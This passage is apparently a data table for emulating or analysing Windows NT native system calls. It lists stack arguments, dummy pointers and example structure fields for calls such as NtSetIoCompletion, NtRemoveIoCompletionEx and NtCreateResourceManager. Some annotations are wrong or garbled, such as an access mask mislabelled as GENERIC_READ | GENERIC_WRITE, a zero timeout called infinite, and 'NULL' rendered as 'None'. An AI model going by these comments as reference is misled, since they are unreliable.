\"additionalComment\": \"PCWNF_STATE_NAME StateName (example: random state name value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtUpdateWnfStateData\": {\r\n \"ntFunc\": \"NtUpdateWnfStateData\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"LOGICAL CheckStamp (FALSE, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"WNF_CHANGE_STAMP MatchingChangeStamp (default, not used)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ExplicitScope (None, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PCWNF_TYPE_ID TypeId (None, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Length (0, default, no buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Buffer (None, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PCWNF_STATE_NAME StateName (None, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtDisableLastKnownGood\": {\r\n \"ntFunc\": \"NtDisableLastKnownGood\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtEnableLastKnownGood\": {\r\n \"ntFunc\": \"NtEnableLastKnownGood\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtCancelSynchronousIoFile\": {\r\n \"ntFunc\": \"NtCancelSynchronousIoFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct40\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoRequestToCancel (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct41\",\r\n \"structureValueExpectations\": \"Pointer to the I/O request to cancel.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct40\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No additional information\"\r\n }\r\n ]\r\n },\r\n \"struct41\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0xC0000120\",\r\n \"fieldComment\": \"STATUS_CANCELLED\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No additional information\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetIoCompletion\": {\r\n \"ntFunc\": \"NtSetIoCompletion\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG NumberOfBytesTransfered (4096 bytes, typical I/O size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"NTSTATUS CompletionStatus (STATUS_SUCCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct42\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG CompletionKey (arbitrary key, 1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000445\",\r\n \"additionalComment\": \"HANDLE IoCompletionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct42\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00001000\",\r\n \"fieldComment\": \"4096 bytes transferred\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetIoCompletionEx\": {\r\n \"ntFunc\": \"NtSetIoCompletionEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"IoStatusInformation (no information, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"IoStatus (STATUS_SUCCESS, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"CompletionValue (None, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"CompletionKey (example key value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"IoCompletionReserveHandle (dummy handle, usually None or reserved)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"IoCompletionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRemoveIoCompletionEx\": {\r\n \"ntFunc\": \"NtRemoveIoCompletionEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00\",\r\n \"additionalComment\": \"Alertable (FALSE, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER Timeout (dummy pointer, usually None for infinite)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct43\",\r\n \"structureValueExpectations\": \"Timeout interval in 100-nanosecond units, negative for relative.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to ULONG NumEntriesRemoved (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"Count (16 entries to remove, example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to FILE_IO_COMPLETION_INFORMATION array (dummy pointer)\",\r\n \"structurePointer\": \"FILE_IO_COMPLETION_INFORMATION\",\r\n \"structureRef\": \"struct44\",\r\n \"structureValueExpectations\": \"Array of FILE_IO_COMPLETION_INFORMATION structures.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"IoCompletionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct43\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"Infinite timeout (None pointer means wait forever)\"\r\n }\r\n ]\r\n },\r\n \"struct44\": {\r\n \"type\": \"FILE_IO_COMPLETION_INFORMATION\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"CompletionKey\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Example completion key\"\r\n },\r\n {\r\n \"fieldName\": \"CompletionValue\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None, example value\"\r\n },\r\n {\r\n \"fieldName\": \"IoStatus\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS\"\r\n },\r\n {\r\n \"fieldName\": \"IoStatusInformation\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No additional information\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtNotifyChangeSession\": {\r\n \"ntFunc\": \"NtNotifyChangeSession\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"BufferSize (4096 bytes, example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to Buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"IoState2 (IO_SESSION_STATE, example value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"IoState (IO_SESSION_STATE, example value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"Action (example action value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Reserved (None, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000005\",\r\n \"additionalComment\": \"IoStateSequence (example sequence number)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"SessionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAssociateWaitCompletionPacket\": {\r\n \"ntFunc\": \"NtAssociateWaitCompletionPacket\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to BOOLEAN (dummy pointer, optional parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"IoStatusInformation (default, no information)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"IoStatus (STATUS_SUCCESS, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"ApcContext (dummy pointer, user context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x12345678\"\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"KeyContext (dummy pointer, user key context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x87654321\"\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"TargetObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"IoCompletionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"WaitCompletionPacketHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtFlushProcessWriteBuffers\": {\r\n \"ntFunc\": \"NtFlushProcessWriteBuffers\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtCommitComplete\": {\r\n \"ntFunc\": \"NtCommitComplete\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER TmVirtualClock (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct45\",\r\n \"structureValueExpectations\": \"Optional virtual clock value; often None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct45\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"None/zero, commonly used for optional TmVirtualClock\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCommitEnlistment\": {\r\n \"ntFunc\": \"NtCommitEnlistment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER TmVirtualClock (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct46\",\r\n \"structureValueExpectations\": \"Optional virtual clock value; often None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000bcde\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct46\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"None/zero, commonly used for optional TmVirtualClock\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCommitTransaction\": {\r\n \"ntFunc\": \"NtCommitTransaction\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN Wait (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cdef\",\r\n \"additionalComment\": \"HANDLE TransactionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateEnlistment\": {\r\n \"ntFunc\": \"NtCreateEnlistment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID EnlistmentKey (None, optional context pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000000F\",\r\n \"additionalComment\": \"NOTIFICATION_MASK NotificationMask (example mask)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG CreateOptions (ENLISTMENT_SUPERIOR, example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct47\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000def0\",\r\n \"additionalComment\": \"HANDLE TransactionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000ef01\",\r\n \"additionalComment\": \"HANDLE ResourceManagerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0001\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_WRITE, example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE EnlistmentHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct47\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateResourceManager\": {\r\n \"ntFunc\": \"NtCreateResourceManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Description (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct48\",\r\n \"structureValueExpectations\": \"Optional description string for the resource manager.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG CreateOptions (default 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct49\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to GUID RmGuid (dummy pointer)\",\r\n \"structurePointer\": \"GUID\",\r\n \"structureRef\": \"struct50\",\r\n \"structureValueExpectations\": \"Globally unique identifier for the resource manager.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000f012\",\r\n \"additionalComment\": \"HANDLE TmHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0001\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_WRITE, example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to HANDLE ResourceManagerHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct48\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Zero length (no description)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Zero maximum length\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None buffer\"\r\n }\r\n ]\r\n },\r\n \"struct49\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n },\r\n \"struct50\": {\r\n \"type\": \"GUID\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Data1\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x12345678\",\r\n \"fieldComment\": \"Example GUID part\"\r\n },\r\n {\r\n \"fieldName\": \"Data2\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x9abc\",\r\n \"fieldComment\": \"Example GUID part\"\r\n },\r\n {\r\n \"fieldName\": \"Data3\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0xdef0\",\r\n \"fieldComment\": \"Example GUID part\"\r\n },\r\n {\r\n \"fieldName\": \"Data4\",\r\n \"fieldType\": \"UCHAR[8]\",\r\n \"fieldValue\": \"0x1122334455667788\",\r\n \"fieldComment\": \"Example GUID part\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateTransaction\": {\r\n \"ntFunc\": \"NtCreateTransaction\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no description)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no timeout specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"IsolationFlags = 0 (default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"IsolationLevel = 0 (default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"CreateOptions = 0 (default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None TmHandle (no transaction manager handle specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None Uow (no UOW GUID specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None ObjectAttributes (default)\",\r\n \"structurePointer\": None,\r\n 